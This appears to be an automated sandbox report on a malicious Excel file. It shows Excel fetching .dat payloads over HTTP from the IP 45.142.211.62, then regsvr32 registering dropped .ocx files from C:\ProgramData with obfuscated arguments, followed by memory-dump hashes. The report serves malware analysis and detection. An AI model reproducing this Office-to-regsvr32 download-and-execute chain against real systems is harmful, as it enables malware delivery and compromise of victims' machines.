                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.224916945.142.211.6280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Dec 2, 2021 16:10:29.632947922 CET3OUTGET /533792932717.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 45.142.211.62
                Connection: Keep-Alive
                Dec 2, 2021 16:10:29.832835913 CET4INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Dec 2021 15:10:30 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                Dec 2, 2021 16:10:29.840528011 CET4OUTGET /533792932717.dat2 HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 45.142.211.62
                Connection: Keep-Alive
                Dec 2, 2021 16:10:30.027399063 CET5INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Thu, 02 Dec 2021 15:10:30 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:16:10:23
                Start date:02/12/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13f030000
                File size:28253536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:10:33
                Start date:02/12/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 C:\ProgramData\Volet1.ocx
                Imagebase:0xff0f0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:10:33
                Start date:02/12/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 C:\ProgramData\Volet2.ocx
                Imagebase:0xff0f0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:10:34
                Start date:02/12/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 C:\ProgramData\Volet3.ocx
                Imagebase:0xff0f0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:10:34
                Start date:02/12/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
                Imagebase:0xff0f0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:10:34
                Start date:02/12/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
                Imagebase:0xff0f0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:16:10:35
                Start date:02/12/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
                Imagebase:0xff0f0000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >

                  Executed Functions

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.707499566.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 936afbd4271a532a2c579e992108a1ea0597df29e70e87c4c0b868a661ca19ef
                  • Instruction ID: a92a6b5b9f9ff520fda81afbcb3bb03970b3c294f1b3a409552c65b57e141417
                  • Opcode Fuzzy Hash: 936afbd4271a532a2c579e992108a1ea0597df29e70e87c4c0b868a661ca19ef
                  • Instruction Fuzzy Hash: 1E62775184E3C21FD74383340C79696BFB1AF13118B6E86EBD4C5CB8A3E24C591AD362
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.707499566.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 717a5895595d41d8deef9b78895bfa439805cd1139d915202475aa576569a134
                  • Instruction ID: f398bede5ca28fba00625e2565dbef310064f4e8b3291566c3616c81c6cde866
                  • Opcode Fuzzy Hash: 717a5895595d41d8deef9b78895bfa439805cd1139d915202475aa576569a134
                  • Instruction Fuzzy Hash: CA62875184E3C21FD74387344C796A6BFB1AF13118B6E86EBD4C5CB8A3E24C591AD362
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.707499566.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9914198cb833362c61a5595ca4c0074a3244be9b979a30aa89b7cf5e654d5c7e
                  • Instruction ID: 6c10105477511b8bb1fd4c33d908f49b381fde4c9872c9155c80e9be03796edf
                  • Opcode Fuzzy Hash: 9914198cb833362c61a5595ca4c0074a3244be9b979a30aa89b7cf5e654d5c7e
                  • Instruction Fuzzy Hash: 8962865184E3C21FD74387345C79696BFB1AF13118B6E86EBE4C5CB8A3E24C491AD362
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.707499566.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7205f6913687fad5d078cbed5a76ddf84508d40b240b11b869643e326cef981
                  • Instruction ID: 10894997fe7f205890f5e70d5dea6c9b6589ca830a36be35ccdf48cf706030c1
                  • Opcode Fuzzy Hash: e7205f6913687fad5d078cbed5a76ddf84508d40b240b11b869643e326cef981
                  • Instruction Fuzzy Hash: DE52765184E3C21FD74387344C79696BFB1AF13118B6E86EBE4C5CB8A3E24C491AD762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.707499566.00000000024E0000.00000004.00000001.sdmp, Offset: 024E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_24e0000_EXCEL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7d65f371ee7799e7b92dc9e78169ac8b85e37fe970bb7d81758b5354c673cff
                  • Instruction ID: 8015dba5a34aa3988511f4da845427f5e053cf689f6d322f8a77d1323af9cf9f
                  • Opcode Fuzzy Hash: a7d65f371ee7799e7b92dc9e78169ac8b85e37fe970bb7d81758b5354c673cff
                  • Instruction Fuzzy Hash: EAD15F5504E3C20FD71383380AB91827FB68E57118B2F55DBD2C2DB4A3E6481A2AE323
                  Uniqueness

                  Uniqueness Score: -1.00%